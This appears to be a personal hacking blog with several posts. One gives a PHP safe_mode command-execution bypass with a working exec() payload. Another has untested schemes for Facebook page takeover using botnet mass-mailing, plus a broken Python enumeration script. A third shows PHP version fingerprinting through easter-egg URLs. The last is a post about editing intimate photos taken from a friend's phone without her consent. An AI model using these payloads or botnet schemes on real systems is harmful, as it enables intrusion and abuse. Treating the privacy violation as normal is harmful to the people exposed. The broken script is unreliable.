bypass

Safe_mode Bypass: PHP < 5.2.10

2:19 PM






Note: This method only works on windows and isn’t discovered by me, but one of the greatest web researchers I know, I just had to share it.





So, to test this, make sure you have php version less than 5.2.10 on a windows machine.
make sure your php.ini file says on for safe_mode or simply by doing


C:\xampp\php>php -n -d safe_mode=on -r “exec(‘notepad’);”

The command “/notepad” is either misspelled or could not be found.

So what does that tell us? its like all safe_mode doing is ad a "/" in whatever input we gave it (would be bad), aside from lots of other bypasses you might think of, one , for windows only, can be used to bypass safe_mode, by using backslashes infront of the command:

C:\xampp\php>php -n -d safe_mode=on -r “exec(‘\calc’);”

Aside from many errors being generated, the code still gets executed and notepad will now pop up.

so our final payload to execute commands while safe_mode is 1 is:

<?php exec('\echo "SHIT" >> notepad.txt'); ?>


works with exec(), passthru, system() functions.

bugbounty

Facebook: What If...?

9:58 AM


Note: none of these hunches have been tested and I have no idea if they really work.

Status Update takeover

First, in https://www.facebook.com/pageusername/settings?tab=mobile Facebook gives away an email address to share a status update remotely, for pages. If you know that email, you can upload anyfile to that *special* email from *any* email and you would get a status file upload in your page.
Forexample say my email is pXy251wiggly@m.facebook.com which is very very very predictable to guess, and emailing to pXy251wiggly@m.facebook.com would result my page having a status update.

Since my name is Paulos Yibelo (pXy) and 251 (my country code) wiggly (a random english dictionary word), and I have changed it to a custom one, don't try it. :P but no, the *predictablity* of the email isn't what I am trying to talk about.

the mail id, there are always 12 in char, if not changed customely. (which is unlikely), and if you notice, they only have small letters and numbers in their ID. and half the word is a dictionary, using this we can construct a recursional automated script to find the email, but note, we can find lots of emails in the process of finding the one we want, random once. but the testing part is the sucker one, we need either zombies or a kickass bulk-mail program, since the domain have no SPF record, it really does not matter who is sending it.
with a friend, we wrote a final python script in http://pastebin.com/7HfJ34Bg to obtain all possible emails.

import random
#values only contain small letters and numbers
letters = '

abcdefghijklmnopqrstuvwxyz0123456789'
def generateWord():
        letter = ''
        for i in range(12): #all possisble values are 12 in length
                letter += random.choice(letters)
        return letter
#add all possible values to list
file = open("wordList.txt","a")
counter = 1;
while True:

        try:
                #avoid duplicates
                generated = generateWord()+"@m.facebook.com
;
                file.write(generated)
                print counter,"words Generated so far"
                counter++;
        except KeyboardInterrupt:
                break

If the above script runs, it will have all the possible combination of emails facebook (will ever) have, which is rising. now we can multi-thread the processes and fasten the process, again and again. 

Note: there is a low probability of finding a large amount of *acutal* emails. thanks to automation and kickass processing, it is possible.

Yes, its less practical. But, let's assume the 7b people around the globe have accounts. Assume I already run that script and have the same database of users Facebook will ever have in a public database file. Assume i got 9 billion zombie/botnets that generally massmail 100 mails in a second, thats 9^10*100 in a second of sending emails. Generally assume all these zombies mail those in the public database programmed to multi-thread so the process succeeds in clean way. Now in my theory, if succed, its less a month to mail all Facebook Page accounts. :)
 

Account ID Takeover

Facebook allows a user to create a username and can be accessed via facebook.com/username or facebook.com/profile.php?id=userid or username, demos include:
facebook.com/hyibelo
facebook.com/profile.php?id=hyibelo
facebook.com/profile.php?id=10000xxxxx

So the flaw here is to overdrive the ID by creating a username with an upcoming or already existing (but no username) having account. Meaning if forexample there is a guy with an id 009834234, (not real) meaning he can access his account via.

facebook.com/009834234
facebook.com/profile.php?id=009834234

But if we create a username with that id from facebook.com/username, then when people navigate to his profile id, they will be getting our username (his id) account.

now Facebook don't allow all-numeric IDs. :)

websecurity

Abusing PHP's Easter Eggs: Revealing PHP Versions

1:09 PM

PHP Comes with some easter eggs for fun. today, I will try to share the way I use to identify the PHP version of a website as an alternative way. This way is useful for information gathering when the traditional nmap scanning & X-Powered-By headers get filtered.

If you add the value "?=PHPE9568F36-D428-11d2-A769-00AA001ACF42"  to the end of any URL that is a PHP page, you will see a funny picture on *most* servers. Note this trick does not work on big sites like Facebook.

There is a hidden function in PHP, which is NOT documented in php.net online manual. php_egg_logo_guid().
The function is defined as a macro preprocessor in php-src/ext/standard/info.h around line 54,

 


The easter egg on april 1 (april fool's) will replace the PHP logo on any phpinfo() page. If the php directive expose _php is set to "off" in php.ini, then the PHP eggs will not show. it is "on" by default. 3 of the web hosting servers I have tried, all of them, did not change it.


?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 is interesting. Below are 6 different images that will be displayed depending on the PHP version.


If the first brown dog appeared, PHP Version 4.3.0 - 4.3.10
If the black dog appeared, PHP Version is PHP Versions 4.3.11 - 4.4.6; and 5.0.4 - 5.1.2
If colored php logo, PHP Version 5.1.3 - 5.2.13
The guy with breadsticks means, PHP Version 4.0.0 - 4.2.3
If the bunny appeared, PHP Version 5.0.0 - 5.0.3
Or else, if the elephant appeared, PHP Version 5.3.0 - current

And easy as that, we have our PHP version range.
the easter eggs also contain, ?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 for PHP credits.
which is almost very similar interface of the phpinfo() page.
Also?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 to identify the zend engine php uses, which is an alternative way of version identification depending on the logo.




Out of Topic, People need to listen to this amazing song. I loved it.

Happy Hacking :)

graphics design

Okay Photoshop Skills

3:48 PM


Well, a heads up, this isn't one of the security articles I do; infact, this is much of a personal reminder that I might look up in 10 years and so and say "look, I wasn't that bad." or atleast "I tried";

Just like every story, it happened a long time ago. so, a long time ago, I used to like Graphics, I still do. Especially if it is a motion graphics. I am familiar with most of adobe products like After Effects and Premeir Pro, but not Photoshop. so, this is going to be, umm, the legacy, of me taking to Photoshop.


So, after a friend accidentally left her phone in my room, I found some pictures of her (nice pictures, if you know what i mean? :P). and taught 'what the hell', let me edit some of those; would kill me time.




Not bad right?